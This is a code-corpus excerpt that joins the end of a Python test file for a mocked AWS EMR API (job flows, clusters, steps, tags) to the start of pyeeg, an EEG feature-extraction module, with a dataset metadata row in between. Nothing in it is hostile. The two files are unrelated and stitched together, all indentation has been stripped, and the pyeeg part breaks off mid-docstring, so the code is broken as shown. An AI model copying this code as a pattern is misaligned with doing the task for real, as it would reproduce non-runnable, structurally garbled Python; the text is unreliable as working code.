'Configurations.member.1.Properties.entry.2.value': 'someothervalue',
'Instances.EmrManagedMasterSecurityGroup': 'master-security-group',
'Instances.Ec2SubnetId': 'subnet-8be41cec',
},
availability_zone='us-east-2b',
ec2_keyname='mykey',
job_flow_role='EMR_EC2_DefaultRole',
keep_alive=False,
log_uri='s3://some_bucket/jobflow_logs',
name='My jobflow',
service_role='EMR_DefaultRole',
visible_to_all_users=True,
))
cluster_id = conn.run_jobflow(**args)
input_tags = {'tag1': 'val1', 'tag2': 'val2'}
conn.add_tags(cluster_id, input_tags)
cluster = conn.describe_cluster(cluster_id)
cluster.applications[0].name.should.equal('Spark')
cluster.applications[0].version.should.equal('2.4.2')
cluster.autoterminate.should.equal('true')
    # configurations appear not to be supplied as attributes?
attrs = cluster.ec2instanceattributes
# AdditionalMasterSecurityGroups
# AdditionalSlaveSecurityGroups
attrs.ec2availabilityzone.should.equal(args['availability_zone'])
attrs.ec2keyname.should.equal(args['ec2_keyname'])
attrs.ec2subnetid.should.equal(args['api_params']['Instances.Ec2SubnetId'])
# EmrManagedMasterSecurityGroups
# EmrManagedSlaveSecurityGroups
attrs.iaminstanceprofile.should.equal(args['job_flow_role'])
# ServiceAccessSecurityGroup
cluster.id.should.equal(cluster_id)
cluster.loguri.should.equal(args['log_uri'])
cluster.masterpublicdnsname.should.be.a(six.string_types)
cluster.name.should.equal(args['name'])
int(cluster.normalizedinstancehours).should.equal(0)
# cluster.release_label
cluster.shouldnt.have.property('requestedamiversion')
cluster.runningamiversion.should.equal('1.0.0')
# cluster.securityconfiguration
cluster.servicerole.should.equal(args['service_role'])
cluster.status.state.should.equal('TERMINATED')
cluster.status.statechangereason.message.should.be.a(six.string_types)
cluster.status.statechangereason.code.should.be.a(six.string_types)
cluster.status.timeline.creationdatetime.should.be.a(six.string_types)
# cluster.status.timeline.enddatetime.should.be.a(six.string_types)
# cluster.status.timeline.readydatetime.should.be.a(six.string_types)
dict((item.key, item.value)
for item in cluster.tags).should.equal(input_tags)
cluster.terminationprotected.should.equal('false')
cluster.visibletoallusers.should.equal('true')
@mock_emr_deprecated
def test_describe_jobflows():
conn = boto.connect_emr()
args = run_jobflow_args.copy()
expected = {}
for idx in range(4):
cluster_name = 'cluster' + str(idx)
args['name'] = cluster_name
cluster_id = conn.run_jobflow(**args)
expected[cluster_id] = {
'id': cluster_id,
'name': cluster_name,
'state': 'WAITING'
}
# need sleep since it appears the timestamp is always rounded to
# the nearest second internally
time.sleep(1)
timestamp = datetime.now(pytz.utc)
time.sleep(1)
for idx in range(4, 6):
cluster_name = 'cluster' + str(idx)
args['name'] = cluster_name
cluster_id = conn.run_jobflow(**args)
conn.terminate_jobflow(cluster_id)
expected[cluster_id] = {
'id': cluster_id,
'name': cluster_name,
'state': 'TERMINATED'
}
jobs = conn.describe_jobflows()
jobs.should.have.length_of(6)
for cluster_id, y in expected.items():
resp = conn.describe_jobflows(jobflow_ids=[cluster_id])
resp.should.have.length_of(1)
resp[0].jobflowid.should.equal(cluster_id)
resp = conn.describe_jobflows(states=['WAITING'])
resp.should.have.length_of(4)
for x in resp:
x.state.should.equal('WAITING')
resp = conn.describe_jobflows(created_before=timestamp)
resp.should.have.length_of(4)
resp = conn.describe_jobflows(created_after=timestamp)
resp.should.have.length_of(2)
@mock_emr_deprecated
def test_describe_jobflow():
conn = boto.connect_emr()
args = run_jobflow_args.copy()
args.update(dict(
ami_version='3.8.1',
api_params={
#'Applications.member.1.Name': 'Spark',
#'Applications.member.1.Version': '2.4.2',
#'Configurations.member.1.Classification': 'yarn-site',
#'Configurations.member.1.Properties.entry.1.key': 'someproperty',
#'Configurations.member.1.Properties.entry.1.value': 'somevalue',
#'Instances.EmrManagedMasterSecurityGroup': 'master-security-group',
'Instances.Ec2SubnetId': 'subnet-8be41cec',
},
ec2_keyname='mykey',
hadoop_version='2.4.0',
name='My jobflow',
log_uri='s3://some_bucket/jobflow_logs',
keep_alive=True,
master_instance_type='c1.medium',
slave_instance_type='c1.medium',
num_instances=2,
availability_zone='us-west-2b',
job_flow_role='EMR_EC2_DefaultRole',
service_role='EMR_DefaultRole',
visible_to_all_users=True,
))
cluster_id = conn.run_jobflow(**args)
jf = conn.describe_jobflow(cluster_id)
jf.amiversion.should.equal(args['ami_version'])
jf.bootstrapactions.should.equal(None)
jf.creationdatetime.should.be.a(six.string_types)
jf.should.have.property('laststatechangereason')
jf.readydatetime.should.be.a(six.string_types)
jf.startdatetime.should.be.a(six.string_types)
jf.state.should.equal('WAITING')
jf.ec2keyname.should.equal(args['ec2_keyname'])
# Ec2SubnetId
jf.hadoopversion.should.equal(args['hadoop_version'])
int(jf.instancecount).should.equal(2)
for ig in jf.instancegroups:
ig.creationdatetime.should.be.a(six.string_types)
# ig.enddatetime.should.be.a(six.string_types)
ig.should.have.property('instancegroupid').being.a(six.string_types)
int(ig.instancerequestcount).should.equal(1)
ig.instancerole.should.be.within(['MASTER', 'CORE'])
int(ig.instancerunningcount).should.equal(1)
ig.instancetype.should.equal('c1.medium')
ig.laststatechangereason.should.be.a(six.string_types)
ig.market.should.equal('ON_DEMAND')
ig.name.should.be.a(six.string_types)
ig.readydatetime.should.be.a(six.string_types)
ig.startdatetime.should.be.a(six.string_types)
ig.state.should.equal('RUNNING')
jf.keepjobflowalivewhennosteps.should.equal('true')
jf.masterinstanceid.should.be.a(six.string_types)
jf.masterinstancetype.should.equal(args['master_instance_type'])
jf.masterpublicdnsname.should.be.a(six.string_types)
int(jf.normalizedinstancehours).should.equal(0)
jf.availabilityzone.should.equal(args['availability_zone'])
jf.slaveinstancetype.should.equal(args['slave_instance_type'])
jf.terminationprotected.should.equal('false')
jf.jobflowid.should.equal(cluster_id)
# jf.jobflowrole.should.equal(args['job_flow_role'])
jf.loguri.should.equal(args['log_uri'])
jf.name.should.equal(args['name'])
# jf.servicerole.should.equal(args['service_role'])
jf.steps.should.have.length_of(0)
list(i.value for i in jf.supported_products).should.equal([])
jf.visibletoallusers.should.equal('true')
@mock_emr_deprecated
def test_list_clusters():
conn = boto.connect_emr()
args = run_jobflow_args.copy()
expected = {}
for idx in range(40):
cluster_name = 'jobflow' + str(idx)
args['name'] = cluster_name
cluster_id = conn.run_jobflow(**args)
expected[cluster_id] = {
'id': cluster_id,
'name': cluster_name,
'normalizedinstancehours': '0',
'state': 'WAITING'
}
# need sleep since it appears the timestamp is always rounded to
# the nearest second internally
time.sleep(1)
timestamp = datetime.now(pytz.utc)
time.sleep(1)
for idx in range(40, 70):
cluster_name = 'jobflow' + str(idx)
args['name'] = cluster_name
cluster_id = conn.run_jobflow(**args)
conn.terminate_jobflow(cluster_id)
expected[cluster_id] = {
'id': cluster_id,
'name': cluster_name,
'normalizedinstancehours': '0',
'state': 'TERMINATED'
}
args = {}
while 1:
resp = conn.list_clusters(**args)
clusters = resp.clusters
len(clusters).should.be.lower_than_or_equal_to(50)
for x in clusters:
y = expected[x.id]
x.id.should.equal(y['id'])
x.name.should.equal(y['name'])
x.normalizedinstancehours.should.equal(
y['normalizedinstancehours'])
x.status.state.should.equal(y['state'])
x.status.timeline.creationdatetime.should.be.a(six.string_types)
if y['state'] == 'TERMINATED':
x.status.timeline.enddatetime.should.be.a(six.string_types)
else:
x.status.timeline.shouldnt.have.property('enddatetime')
x.status.timeline.readydatetime.should.be.a(six.string_types)
if not hasattr(resp, 'marker'):
break
args = {'marker': resp.marker}
resp = conn.list_clusters(cluster_states=['TERMINATED'])
resp.clusters.should.have.length_of(30)
for x in resp.clusters:
x.status.state.should.equal('TERMINATED')
resp = conn.list_clusters(created_before=timestamp)
resp.clusters.should.have.length_of(40)
resp = conn.list_clusters(created_after=timestamp)
resp.clusters.should.have.length_of(30)
@mock_emr_deprecated
def test_run_jobflow():
conn = boto.connect_emr()
args = run_jobflow_args.copy()
job_id = conn.run_jobflow(**args)
job_flow = conn.describe_jobflow(job_id)
job_flow.state.should.equal('WAITING')
job_flow.jobflowid.should.equal(job_id)
job_flow.name.should.equal(args['name'])
job_flow.masterinstancetype.should.equal(args['master_instance_type'])
job_flow.slaveinstancetype.should.equal(args['slave_instance_type'])
job_flow.loguri.should.equal(args['log_uri'])
job_flow.visibletoallusers.should.equal('false')
int(job_flow.normalizedinstancehours).should.equal(0)
job_flow.steps.should.have.length_of(0)
@mock_emr_deprecated
def test_run_jobflow_in_multiple_regions():
regions = {}
for region in ['us-east-1', 'eu-west-1']:
conn = boto.emr.connect_to_region(region)
args = run_jobflow_args.copy()
args['name'] = region
cluster_id = conn.run_jobflow(**args)
regions[region] = {'conn': conn, 'cluster_id': cluster_id}
for region in regions.keys():
conn = regions[region]['conn']
jf = conn.describe_jobflow(regions[region]['cluster_id'])
jf.name.should.equal(region)
@requires_boto_gte("2.8")
@mock_emr_deprecated
def test_run_jobflow_with_new_params():
# Test that run_jobflow works with newer params
conn = boto.connect_emr()
conn.run_jobflow(**run_jobflow_args)
@requires_boto_gte("2.8")
@mock_emr_deprecated
def test_run_jobflow_with_visible_to_all_users():
conn = boto.connect_emr()
for expected in (True, False):
job_id = conn.run_jobflow(
visible_to_all_users=expected,
**run_jobflow_args
)
job_flow = conn.describe_jobflow(job_id)
job_flow.visibletoallusers.should.equal(str(expected).lower())
@requires_boto_gte("2.8")
@mock_emr_deprecated
def test_run_jobflow_with_instance_groups():
input_groups = dict((g.name, g) for g in input_instance_groups)
conn = boto.connect_emr()
job_id = conn.run_jobflow(instance_groups=input_instance_groups,
**run_jobflow_args)
job_flow = conn.describe_jobflow(job_id)
int(job_flow.instancecount).should.equal(
sum(g.num_instances for g in input_instance_groups))
for instance_group in job_flow.instancegroups:
expected = input_groups[instance_group.name]
instance_group.should.have.property('instancegroupid')
int(instance_group.instancerunningcount).should.equal(
expected.num_instances)
instance_group.instancerole.should.equal(expected.role)
instance_group.instancetype.should.equal(expected.type)
instance_group.market.should.equal(expected.market)
if hasattr(expected, 'bidprice'):
instance_group.bidprice.should.equal(expected.bidprice)
@requires_boto_gte("2.8")
@mock_emr_deprecated
def test_set_termination_protection():
conn = boto.connect_emr()
job_id = conn.run_jobflow(**run_jobflow_args)
job_flow = conn.describe_jobflow(job_id)
job_flow.terminationprotected.should.equal('false')
conn.set_termination_protection(job_id, True)
job_flow = conn.describe_jobflow(job_id)
job_flow.terminationprotected.should.equal('true')
conn.set_termination_protection(job_id, False)
job_flow = conn.describe_jobflow(job_id)
job_flow.terminationprotected.should.equal('false')
@requires_boto_gte("2.8")
@mock_emr_deprecated
def test_set_visible_to_all_users():
conn = boto.connect_emr()
args = run_jobflow_args.copy()
args['visible_to_all_users'] = False
job_id = conn.run_jobflow(**args)
job_flow = conn.describe_jobflow(job_id)
job_flow.visibletoallusers.should.equal('false')
conn.set_visible_to_all_users(job_id, True)
job_flow = conn.describe_jobflow(job_id)
job_flow.visibletoallusers.should.equal('true')
conn.set_visible_to_all_users(job_id, False)
job_flow = conn.describe_jobflow(job_id)
job_flow.visibletoallusers.should.equal('false')
@mock_emr_deprecated
def test_terminate_jobflow():
conn = boto.connect_emr()
job_id = conn.run_jobflow(**run_jobflow_args)
flow = conn.describe_jobflows()[0]
flow.state.should.equal('WAITING')
conn.terminate_jobflow(job_id)
flow = conn.describe_jobflows()[0]
flow.state.should.equal('TERMINATED')
# testing multiple end points for each feature
@mock_emr_deprecated
def test_bootstrap_actions():
bootstrap_actions = [
BootstrapAction(
name='bs1',
path='path/to/script',
bootstrap_action_args=['arg1', 'arg2&arg3']),
BootstrapAction(
name='bs2',
path='path/to/anotherscript',
bootstrap_action_args=[])
]
conn = boto.connect_emr()
cluster_id = conn.run_jobflow(
bootstrap_actions=bootstrap_actions,
**run_jobflow_args
)
jf = conn.describe_jobflow(cluster_id)
for x, y in zip(jf.bootstrapactions, bootstrap_actions):
x.name.should.equal(y.name)
x.path.should.equal(y.path)
list(o.value for o in x.args).should.equal(y.args())
resp = conn.list_bootstrap_actions(cluster_id)
for i, y in enumerate(bootstrap_actions):
x = resp.actions[i]
x.name.should.equal(y.name)
x.scriptpath.should.equal(y.path)
list(arg.value for arg in x.args).should.equal(y.args())
@mock_emr_deprecated
def test_instance_groups():
input_groups = dict((g.name, g) for g in input_instance_groups)
conn = boto.connect_emr()
args = run_jobflow_args.copy()
for key in ['master_instance_type', 'slave_instance_type', 'num_instances']:
del args[key]
args['instance_groups'] = input_instance_groups[:2]
job_id = conn.run_jobflow(**args)
jf = conn.describe_jobflow(job_id)
base_instance_count = int(jf.instancecount)
conn.add_instance_groups(job_id, input_instance_groups[2:])
jf = conn.describe_jobflow(job_id)
int(jf.instancecount).should.equal(
sum(g.num_instances for g in input_instance_groups))
for x in jf.instancegroups:
y = input_groups[x.name]
if hasattr(y, 'bidprice'):
x.bidprice.should.equal(y.bidprice)
x.creationdatetime.should.be.a(six.string_types)
# x.enddatetime.should.be.a(six.string_types)
x.should.have.property('instancegroupid')
int(x.instancerequestcount).should.equal(y.num_instances)
x.instancerole.should.equal(y.role)
int(x.instancerunningcount).should.equal(y.num_instances)
x.instancetype.should.equal(y.type)
x.laststatechangereason.should.be.a(six.string_types)
x.market.should.equal(y.market)
x.name.should.be.a(six.string_types)
x.readydatetime.should.be.a(six.string_types)
x.startdatetime.should.be.a(six.string_types)
x.state.should.equal('RUNNING')
for x in conn.list_instance_groups(job_id).instancegroups:
y = input_groups[x.name]
if hasattr(y, 'bidprice'):
x.bidprice.should.equal(y.bidprice)
# Configurations
# EbsBlockDevices
# EbsOptimized
x.should.have.property('id')
x.instancegrouptype.should.equal(y.role)
x.instancetype.should.equal(y.type)
x.market.should.equal(y.market)
x.name.should.equal(y.name)
int(x.requestedinstancecount).should.equal(y.num_instances)
int(x.runninginstancecount).should.equal(y.num_instances)
# ShrinkPolicy
x.status.state.should.equal('RUNNING')
x.status.statechangereason.code.should.be.a(six.string_types)
x.status.statechangereason.message.should.be.a(six.string_types)
x.status.timeline.creationdatetime.should.be.a(six.string_types)
# x.status.timeline.enddatetime.should.be.a(six.string_types)
x.status.timeline.readydatetime.should.be.a(six.string_types)
igs = dict((g.name, g) for g in jf.instancegroups)
conn.modify_instance_groups(
[igs['task-1'].instancegroupid, igs['task-2'].instancegroupid],
[2, 3])
jf = conn.describe_jobflow(job_id)
int(jf.instancecount).should.equal(base_instance_count + 5)
igs = dict((g.name, g) for g in jf.instancegroups)
int(igs['task-1'].instancerunningcount).should.equal(2)
int(igs['task-2'].instancerunningcount).should.equal(3)
@mock_emr_deprecated
def test_steps():
input_steps = [
StreamingStep(
name='My wordcount example',
mapper='s3n://elasticmapreduce/samples/wordcount/wordSplitter.py',
reducer='aggregate',
input='s3n://elasticmapreduce/samples/wordcount/input',
output='s3n://output_bucket/output/wordcount_output'),
StreamingStep(
name='My wordcount example & co.',
mapper='s3n://elasticmapreduce/samples/wordcount/wordSplitter2.py',
reducer='aggregate',
input='s3n://elasticmapreduce/samples/wordcount/input2',
output='s3n://output_bucket/output/wordcount_output2')
]
# TODO: implementation and test for cancel_steps
conn = boto.connect_emr()
cluster_id = conn.run_jobflow(
steps=[input_steps[0]],
**run_jobflow_args)
jf = conn.describe_jobflow(cluster_id)
jf.steps.should.have.length_of(1)
conn.add_jobflow_steps(cluster_id, [input_steps[1]])
jf = conn.describe_jobflow(cluster_id)
jf.steps.should.have.length_of(2)
for step in jf.steps:
step.actiononfailure.should.equal('TERMINATE_JOB_FLOW')
list(arg.value for arg in step.args).should.have.length_of(8)
step.creationdatetime.should.be.a(six.string_types)
# step.enddatetime.should.be.a(six.string_types)
step.jar.should.equal(
'/home/hadoop/contrib/streaming/hadoop-streaming.jar')
step.laststatechangereason.should.be.a(six.string_types)
step.mainclass.should.equal('')
step.name.should.be.a(six.string_types)
# step.readydatetime.should.be.a(six.string_types)
# step.startdatetime.should.be.a(six.string_types)
step.state.should.be.within(['STARTING', 'PENDING'])
expected = dict((s.name, s) for s in input_steps)
steps = conn.list_steps(cluster_id).steps
for x in steps:
y = expected[x.name]
# actiononfailure
list(arg.value for arg in x.config.args).should.equal([
'-mapper', y.mapper,
'-reducer', y.reducer,
'-input', y.input,
'-output', y.output,
])
x.config.jar.should.equal(
'/home/hadoop/contrib/streaming/hadoop-streaming.jar')
x.config.mainclass.should.equal('')
# properties
x.should.have.property('id').should.be.a(six.string_types)
x.name.should.equal(y.name)
x.status.state.should.be.within(['STARTING', 'PENDING'])
# x.status.statechangereason
x.status.timeline.creationdatetime.should.be.a(six.string_types)
# x.status.timeline.enddatetime.should.be.a(six.string_types)
# x.status.timeline.startdatetime.should.be.a(six.string_types)
x = conn.describe_step(cluster_id, x.id)
list(arg.value for arg in x.config.args).should.equal([
'-mapper', y.mapper,
'-reducer', y.reducer,
'-input', y.input,
'-output', y.output,
])
x.config.jar.should.equal(
'/home/hadoop/contrib/streaming/hadoop-streaming.jar')
x.config.mainclass.should.equal('')
# properties
x.should.have.property('id').should.be.a(six.string_types)
x.name.should.equal(y.name)
x.status.state.should.be.within(['STARTING', 'PENDING'])
# x.status.statechangereason
x.status.timeline.creationdatetime.should.be.a(six.string_types)
# x.status.timeline.enddatetime.should.be.a(six.string_types)
# x.status.timeline.startdatetime.should.be.a(six.string_types)
@requires_boto_gte('2.39')
def test_list_steps_with_states():
# boto's list_steps prior to 2.39 has a bug that ignores
# step_states argument.
steps = conn.list_steps(cluster_id).steps
step_id = steps[0].id
steps = conn.list_steps(cluster_id, step_states=['STARTING']).steps
steps.should.have.length_of(1)
steps[0].id.should.equal(step_id)
test_list_steps_with_states()
@mock_emr_deprecated
def test_tags():
input_tags = {"tag1": "val1", "tag2": "val2"}
conn = boto.connect_emr()
cluster_id = conn.run_jobflow(**run_jobflow_args)
conn.add_tags(cluster_id, input_tags)
cluster = conn.describe_cluster(cluster_id)
cluster.tags.should.have.length_of(2)
dict((t.key, t.value) for t in cluster.tags).should.equal(input_tags)
conn.remove_tags(cluster_id, list(input_tags.keys()))
cluster = conn.describe_cluster(cluster_id)
cluster.tags.should.have.length_of(0)
| apache-2.0 | -2,149,370,948,167,681,300 | 35.855623 | 82 | 0.652757 | false |
ftuyama/TEEG | mindwave/pyeeg.py | 2 | 23008 | """Copyleft 2010 Forrest Sheng Bao http://fsbao.net
PyEEG, a Python module to extract EEG features, v 0.02_r2
Project homepage: http://pyeeg.org
**Data structure**
PyEEG only uses standard Python and numpy data structures,
so you need to import numpy before using it.
For numpy, please visit http://numpy.scipy.org
**Naming convention**
I follow "Style Guide for Python Code" to code my program
http://www.python.org/dev/peps/pep-0008/
Constants: UPPER_CASE_WITH_UNDERSCORES, e.g., SAMPLING_RATE, LENGTH_SIGNAL.
Function names: lower_case_with_underscores, e.g., spectrum_entropy.
Variables (global and local): CapitalizedWords or CapWords, e.g., Power.
If a variable name consists of one letter, I may use lower case, e.g., x, y.
Functions listed alphabetically
--------------------------------------------------
"""
from numpy.fft import fft
from numpy import zeros, floor, log10, log, mean, array, sqrt, vstack, cumsum, \
ones, log2, std
from numpy.linalg import svd, lstsq
import time
######################## Functions contributed by Xin Liu #################
def hurst(X):
""" Compute the Hurst exponent of X. If the output H=0.5,the behavior
of the time-series is similar to random walk. If H<0.5, the time-series
cover less "distance" than a random walk, vice verse.
Parameters
----------
X
list
a time series
Returns
-------
H
float
Hurst exponent
Examples
--------
>>> import pyeeg
>>> from numpy.random import randn
>>> a = randn(4096)
>>> pyeeg.hurst(a)
    0.5057444
"""
N = len(X)
T = array([float(i) for i in xrange(1,N+1)])
Y = cumsum(X)
Ave_T = Y/T
S_T = zeros((N))
R_T = zeros((N))
for i in xrange(N):
S_T[i] = std(X[:i+1])
X_T = Y - T * Ave_T[i]
R_T[i] = max(X_T[:i + 1]) - min(X_T[:i + 1])
R_S = R_T / S_T
R_S = log(R_S)
n = log(T).reshape(N, 1)
H = lstsq(n[1:], R_S[1:])[0]
return H[0]
######################## Begin function definitions #######################
def embed_seq(X,Tau,D):
"""Build a set of embedding sequences from given time series X with lag Tau
and embedding dimension DE. Let X = [x(1), x(2), ... , x(N)], then for each
i such that 1 < i < N - (D - 1) * Tau, we build an embedding sequence,
Y(i) = [x(i), x(i + Tau), ... , x(i + (D - 1) * Tau)]. All embedding
sequence are placed in a matrix Y.
Parameters
----------
X
list
a time series
Tau
integer
the lag or delay when building embedding sequence
D
integer
the embedding dimension
Returns
-------
Y
2-D list
embedding matrix built
Examples
---------------
>>> import pyeeg
>>> a=range(0,9)
>>> pyeeg.embed_seq(a,1,4)
array([[ 0., 1., 2., 3.],
[ 1., 2., 3., 4.],
[ 2., 3., 4., 5.],
[ 3., 4., 5., 6.],
[ 4., 5., 6., 7.],
[ 5., 6., 7., 8.]])
>>> pyeeg.embed_seq(a,2,3)
array([[ 0., 2., 4.],
[ 1., 3., 5.],
[ 2., 4., 6.],
[ 3., 5., 7.],
[ 4., 6., 8.]])
>>> pyeeg.embed_seq(a,4,1)
array([[ 0.],
[ 1.],
[ 2.],
[ 3.],
[ 4.],
[ 5.],
[ 6.],
[ 7.],
[ 8.]])
"""
N =len(X)
if D * Tau > N:
print "Cannot build such a matrix, because D * Tau > N"
exit()
if Tau<1:
print "Tau has to be at least 1"
exit()
Y=zeros((N - (D - 1) * Tau, D))
for i in xrange(0, N - (D - 1) * Tau):
for j in xrange(0, D):
Y[i][j] = X[i + j * Tau]
return Y
def in_range(Template, Scroll, Distance):
"""Determines whether one vector is the the range of another vector.
The two vectors should have equal length.
Parameters
-----------------
Template
list
The template vector, one of two vectors being compared
Scroll
list
The scroll vector, one of the two vectors being compared
    Distance
        float
        Two vectors match if their distance is no greater than Distance
Notes
-------
The distance between two vectors can be defined as Euclidean distance
according to some publications.
The two vector should of equal length
"""
for i in range(0, len(Template)):
if abs(Template[i] - Scroll[i]) > Distance:
return False
return True
""" Desperate code, but do not delete
def bit_in_range(Index):
if abs(Scroll[Index] - Template[Bit]) <= Distance :
print "Bit=", Bit, "Scroll[Index]", Scroll[Index], "Template[Bit]",\
Template[Bit], "abs(Scroll[Index] - Template[Bit])",\
abs(Scroll[Index] - Template[Bit])
return Index + 1 # move
Match_No_Tail = range(0, len(Scroll) - 1) # except the last one
# print Match_No_Tail
# first compare Template[:-2] and Scroll[:-2]
for Bit in xrange(0, len(Template) - 1): # every bit of Template is in range of Scroll
Match_No_Tail = filter(bit_in_range, Match_No_Tail)
print Match_No_Tail
# second and last, check whether Template[-1] is in range of Scroll and
# Scroll[-1] in range of Template
# 2.1 Check whether Template[-1] is in the range of Scroll
Bit = - 1
Match_All = filter(bit_in_range, Match_No_Tail)
# 2.2 Check whether Scroll[-1] is in the range of Template
# I just write a loop for this.
for i in Match_All:
if abs(Scroll[-1] - Template[i] ) <= Distance:
Match_All.remove(i)
return len(Match_All), len(Match_No_Tail)
"""
def bin_power(X,Band,Fs):
"""Compute power in each frequency bin specified by Band from FFT result of
X. By default, X is a real signal.
Note
-----
A real signal can be synthesized, thus not real.
Parameters
-----------
Band
list
boundary frequencies (in Hz) of bins. They can be unequal bins, e.g.
[0.5,4,7,12,30] which are delta, theta, alpha and beta respectively.
You can also use range() function of Python to generate equal bins and
pass the generated list to this function.
Each element of Band is a physical frequency and shall not exceed the
Nyquist frequency, i.e., half of sampling frequency.
X
list
a 1-D real time series.
Fs
integer
the sampling rate in physical frequency
Returns
-------
Power
list
spectral power in each frequency bin.
Power_ratio
list
spectral power in each frequency bin normalized by total power in ALL
frequency bins.
"""
C = fft(X)
C = abs(C)
Power =zeros(len(Band)-1);
for Freq_Index in xrange(0,len(Band)-1):
Freq = float(Band[Freq_Index]) ## Xin Liu
Next_Freq = float(Band[Freq_Index+1])
Power[Freq_Index] = sum(C[int(floor(Freq/Fs*len(X))):int(floor(Next_Freq/Fs*len(X)))])
Power_Ratio = Power/sum(Power)
return Power, Power_Ratio
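# Illustrative usage sketch (not part of the original module): band powers of a
# synthetic 10 Hz sine sampled at 128 Hz. The band edges follow the
# delta/theta/alpha/beta convention from the docstring above; the sampling rate,
# duration and frequency are assumptions made only for the demonstration.
def _example_bin_power():
    from numpy import sin, pi, arange
    Fs = 128                                   # sampling rate in Hz
    t = arange(0, 4, 1.0 / Fs)                 # 4 seconds of data
    X = sin(2 * pi * 10 * t)                   # 10 Hz sine, i.e. alpha band
    Band = [0.5, 4, 7, 12, 30]                 # delta, theta, alpha, beta edges
    Power, Power_Ratio = bin_power(X, Band, Fs)
    return Power, Power_Ratio                  # the alpha bin dominates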
def first_order_diff(X):
""" Compute the first order difference of a time series.
For a time series X = [x(1), x(2), ... , x(N)], its first order
difference is:
Y = [x(2) - x(1) , x(3) - x(2), ..., x(N) - x(N-1)]
"""
D=[]
for i in xrange(1,len(X)):
D.append(X[i]-X[i-1])
return D
def pfd(X, D=None):
"""Compute Petrosian Fractal Dimension of a time series from either two
cases below:
1. X, the time series of type list (default)
2. D, the first order differential sequence of X (if D is provided,
recommended to speed up)
In case 1, D is computed by first_order_diff(X) function of pyeeg
To speed up, it is recommended to compute D before calling this function
because D may also be used by other functions whereas computing it here
again will slow down.
"""
if D is None: ## Xin Liu
D = first_order_diff(X)
N_delta= 0; #number of sign changes in derivative of the signal
for i in xrange(1,len(D)):
if D[i]*D[i-1]<0:
N_delta += 1
n = len(X)
    # Petrosian fractal dimension: log10(n) / (log10(n) + log10(n / (n + 0.4 * N_delta)))
    return log10(n) / (log10(n) + log10(n / (n + 0.4 * N_delta)))
def hfd(X, Kmax):
""" Compute Hjorth Fractal Dimension of a time series X, kmax
is an HFD parameter
"""
L = [];
x = []
N = len(X)
for k in xrange(1,Kmax):
Lk = []
for m in xrange(0,k):
Lmk = 0
for i in xrange(1,int(floor((N-m)/k))):
Lmk += abs(X[m+i*k] - X[m+i*k-k])
Lmk = Lmk*(N - 1)/floor((N - m) / float(k)) / k
Lk.append(Lmk)
L.append(log(mean(Lk)))
x.append([log(float(1) / k), 1])
(p, r1, r2, s)=lstsq(x, L)
return p[0]
def hjorth(X, D = None):
""" Compute Hjorth mobility and complexity of a time series from either two
cases below:
1. X, the time series of type list (default)
2. D, a first order differential sequence of X (if D is provided,
recommended to speed up)
In case 1, D is computed by first_order_diff(X) function of pyeeg
Notes
-----
To speed up, it is recommended to compute D before calling this function
because D may also be used by other functions whereas computing it here
again will slow down.
Parameters
----------
X
list
a time series
D
list
first order differential sequence of a time series
Returns
-------
As indicated in return line
Hjorth mobility and complexity
"""
if D is None:
D = first_order_diff(X)
D.insert(0, X[0]) # pad the first difference
D = array(D)
n = len(X)
M2 = float(sum(D ** 2)) / n
TP = sum(array(X) ** 2)
M4 = 0;
for i in xrange(1, len(D)):
M4 += (D[i] - D[i - 1]) ** 2
M4 = M4 / n
return sqrt(M2 / TP), sqrt(float(M4) * TP / M2 / M2) # Hjorth Mobility and Complexity
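# Illustrative usage sketch (not part of the original module): Hjorth mobility
# and complexity of a white-noise series. randn and the series length are
# assumptions used only to make the example self-contained.
def _example_hjorth():
    from numpy.random import randn
    X = list(randn(1024))
    mobility, complexity = hjorth(X)
    return mobility, complexity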
def spectral_entropy(X, Band, Fs, Power_Ratio = None):
"""Compute spectral entropy of a time series from either two cases below:
1. X, the time series (default)
2. Power_Ratio, a list of normalized signal power in a set of frequency
bins defined in Band (if Power_Ratio is provided, recommended to speed up)
In case 1, Power_Ratio is computed by bin_power() function.
Notes
-----
To speed up, it is recommended to compute Power_Ratio before calling this
function because it may also be used by other functions whereas computing
it here again will slow down.
Parameters
----------
Band
list
boundary frequencies (in Hz) of bins. They can be unequal bins, e.g.
[0.5,4,7,12,30] which are delta, theta, alpha and beta respectively.
You can also use range() function of Python to generate equal bins and
pass the generated list to this function.
Each element of Band is a physical frequency and shall not exceed the
Nyquist frequency, i.e., half of sampling frequency.
X
list
a 1-D real time series.
Fs
integer
the sampling rate in physical frequency
Returns
-------
As indicated in return line
See Also
--------
bin_power: pyeeg function that computes spectral power in frequency bins
"""
if Power_Ratio is None:
Power, Power_Ratio = bin_power(X, Band, Fs)
Spectral_Entropy = 0
for i in xrange(0, len(Power_Ratio) - 1):
Spectral_Entropy += Power_Ratio[i] * log(Power_Ratio[i])
Spectral_Entropy /= log(len(Power_Ratio)) # to save time, minus one is omitted
return -1 * Spectral_Entropy
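# Illustrative usage sketch (not part of the original module): spectral entropy
# of the same synthetic 10 Hz sine used in the bin_power example above. Because
# a pure sine concentrates its power in a single bin, the result is near zero;
# the band edges are the same assumed delta/theta/alpha/beta boundaries.
def _example_spectral_entropy():
    from numpy import sin, pi, arange
    Fs = 128
    t = arange(0, 4, 1.0 / Fs)
    X = sin(2 * pi * 10 * t)
    Band = [0.5, 4, 7, 12, 30]
    return spectral_entropy(X, Band, Fs)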
def svd_entropy(X, Tau, DE, W = None):
"""Compute SVD Entropy from either two cases below:
1. a time series X, with lag tau and embedding dimension dE (default)
2. a list, W, of normalized singular values of a matrix (if W is provided,
recommend to speed up.)
If W is None, the function will do as follows to prepare singular spectrum:
    First, compute an embedding matrix from X, Tau and DE using pyeeg
function embed_seq():
M = embed_seq(X, Tau, DE)
Second, use scipy.linalg function svd to decompose the embedding matrix
M and obtain a list of singular values:
W = svd(M, compute_uv=0)
At last, normalize W:
W /= sum(W)
Notes
-------------
To speed up, it is recommended to compute W before calling this function
because W may also be used by other functions whereas computing it here
again will slow down.
"""
if W is None:
        Y = embed_seq(X, Tau, DE)  # build the embedding matrix from the series
W = svd(Y, compute_uv = 0)
W /= sum(W) # normalize singular values
return -1*sum(W * log(W))
def fisher_info(X, Tau, DE, W = None):
""" Compute Fisher information of a time series from either two cases below:
1. X, a time series, with lag Tau and embedding dimension DE (default)
2. W, a list of normalized singular values, i.e., singular spectrum (if W is
provided, recommended to speed up.)
If W is None, the function will do as follows to prepare singular spectrum:
    First, compute an embedding matrix from X, Tau and DE using pyeeg
function embed_seq():
M = embed_seq(X, Tau, DE)
